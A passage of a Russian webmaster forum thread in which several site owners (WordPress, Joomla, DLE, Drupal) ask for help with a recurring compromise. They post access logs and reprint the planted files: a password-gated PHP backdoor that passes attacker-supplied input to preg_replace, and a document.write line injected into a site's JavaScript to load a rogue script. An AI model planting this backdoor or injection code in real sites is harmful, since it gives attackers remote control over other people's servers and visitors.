- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
AAAAllleex, 1 и 2 - одинаковые шеллы wso 2.5, 3й - скрипт для загрузки
Такая же участь настигла мои сайты (2 WP, 1 Joomla), все на одном VPS. Вчера обновил движки сайтов до последних версий. Создается 2 файла, всегда с разными именами: к примеру blac.js и melbourne.swf и кусок кода прописывается в какой-нибудь из .js файлов к примеру в jquery.js нашел:
Файлы создаются в разных местах с разными именами. На Джумле поставил права на папки 555. Со вчерашнего дня смотрю логи сервера: для джумлы пока вирусных файлов не появлялось, а для WP уже по 2 -3 раза появлялись с разными именами. Расскажите как искать шелл, смотрю тут у некоторых файлы php появлялись еще, в которых вероятно и есть шелл, у себя пока найти не смог их. Писать хостеру? Сейчас запустил сканирование каспером, ESS на ПК ничего не нашел. В ФТП пароли сменил и убрал их из файлзиллы. Куда копать? Менять права на файлы WP на 444? Буду благодарен любой помощи.
Только что заметил:
Есть файл в WP. Этот файл должен быть в WP?
/wp-admin/js/set-post-thumbnail.dev.php
Вот еще логи сервера для сайта на WP:
178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 2 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET / HTTP/1.0" 200 41266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-content/plugins/auto-highslide/highslide/highslide-with-html.packed.js HTTP/1.0" 200 32221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-includes/images/crystal/jomama.swf HTTP/1.0" 200 39 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 281 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-includes/images/smilies/galata.js HTTP/1.0" 200 39 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
178.33.69.67 - - [16/Dec/2013:08:03:29 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 45 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - IP моего сервера
Далее проверил логи сервера для сайта на Джумле:
XX.X.199.200 - - [15/Dec/2013:00:57:57 +0400] "GET /includes/js/tabs/mememe.js HTTP/1.0" 200 39 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
178.33.69.67 - - [15/Dec/2013:00:57:53 +0400] "POST /administrator/images/bookmarks.php HTTP/1.0" 200 216 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
178.33.69.67 - - [15/Dec/2013:00:57:57 +0400] "POST /administrator/images/bookmarks.php HTTP/1.0" 200 45 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
Нашел файл: /administrator/images/bookmarks.php
Вот содержимое подозрительных файлов:
<?php
if (md5($_POST['p']) == 'd1873f535de1bfbcb586ad2c830adec9') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
/wp-admin/js/set-post-thumbnail.dev.php
<?php
if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
Как видно, код практически совпадает... Подскажите пожалуйста, это шелл?
У меня аналогичная беда на ДЛЕ 10. Два первых файла, js и swf всегда где-то в папке uploads/post, и кусок кода нашел у себя в engine/classes/js/jquery.js
Беда общая, выходит. :( Айболитом гонял, ничего не нашел. А файлики удаляешь, через некоторое время снова появляются, с другими именами.
Наверное да, шелл, только где корни искать, не понятно. Но дело не в движках значит, а скорее в серверах?
Скорее всего надо играть правами на папки чтобы не смогли записать туда. А также .htaccess
Хотя у меня тоже были подобные проблемы, я пока так защищаюсь...
Скорее всего надо играть правами на папки чтобы не смогли записать туда. А также .htaccess
Хотя у меня тоже были подобные проблемы, я пока так защищаюсь...
Что тогда и как прописать в .htaccess, который находится в папке uploads, что бы в нее и во все вложенные нельзя было загрузить js и swf ?
При утсановке двига рекомендуется:
Какие тогда выставить правильней?
Абсолютно то же самое на Drupal 6. В логах - тот же IP:
89.253.232.183 - - [16/Dec/2013:05:14:47 +0400] "GET /sites/default/files/blaine.js HTTP/1.0" 200 413 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
178.33.69.67 - - [16/Dec/2013:05:14:46 +0400] "POST /modules/comment/comment-wrapper.tpl1.php HTTP/1.0" 200 385 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
178.33.69.67 - - [16/Dec/2013:05:14:47 +0400] "POST /modules/comment/comment-wrapper.tpl1.php HTTP/1.0" 200 205 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
Что если попробовать заблокировать доступ для IP 178.33.69.67?
Абсолютно то же самое на Drupal 6. В логах - тот же IP:
Что если попробовать заблокировать доступ для IP 178.33.69.67?
Ничего не мешает воспользоваться проксями, замучаетесь блокировать.
SergPolyak, посмотрите содержимое файла /modules/comment/comment-wrapper.tpl1.php
Я подозреваю что оригинальный файл должен быть такой:
/modules/comment/comment-wrapper.tpl.php
Т.е. без цифры 1. Хотя могу ошибаться, с друпалом не работал.
Привет всем пострадавшим от этой заразы.
Это уже эпидемия какая-то... Тот же айпи (178.33.69.67) спокойно грузит файлы js, swf, php. Удаляешь - появляются вновь под другими именами и в других папках.
Главный вопрос на который пока ответа нет - как хакер льёт файлы... У меня к примеру даже доступ по ФТП закрыт. Какую уязвимость использует вирус... Давайте ребят над этим подумаем вместе. Варианты есть?
Пока вариант один, что врядли это дыры именно двига, т.к. мы уже видим здесь 3 популярные цмс, в которые внедряется эта гадость по одному и тому же сценарию.
П.с. Посмотрел только что логи по этому айпи - с него у меня и форум на вбуллетине долбит... Только пока еще не нашел, что и где он и там оставил. В файле, к которому там обращался прописано только это:
if (md5($_POST['p']) == '768f9a3926cc869d7d3c9e10e68ae97a') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
И на сайте ДЛЕ 10 новая вставка, теперь в в engine/classes/js/dle_js.js такое:
;document.write("<scr"+"ipt src='/uploads/posts/2009-11/cloclo.js'><"+"/script>");
Ну и соответственно сам cloclo.js с содержимым: